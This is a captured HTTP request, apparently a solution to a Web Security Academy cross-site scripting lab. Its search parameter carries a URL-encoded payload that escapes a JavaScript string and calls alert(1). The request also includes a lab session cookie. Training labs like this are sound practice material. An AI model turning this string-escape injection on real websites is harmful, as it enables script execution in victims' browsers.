GET /?search=%5C%22-alert%281%29%7D%2F%2F HTTP/1.1
Host: acbd1f0f1ee226bb806f7eae00480011.web-security-academy.net
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://acbd1f0f1ee226bb806f7eae00480011.web-security-academy.net/?search=xss
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=CZ7rO63ZWURLN7v2czbOsE9x2e9ilP6I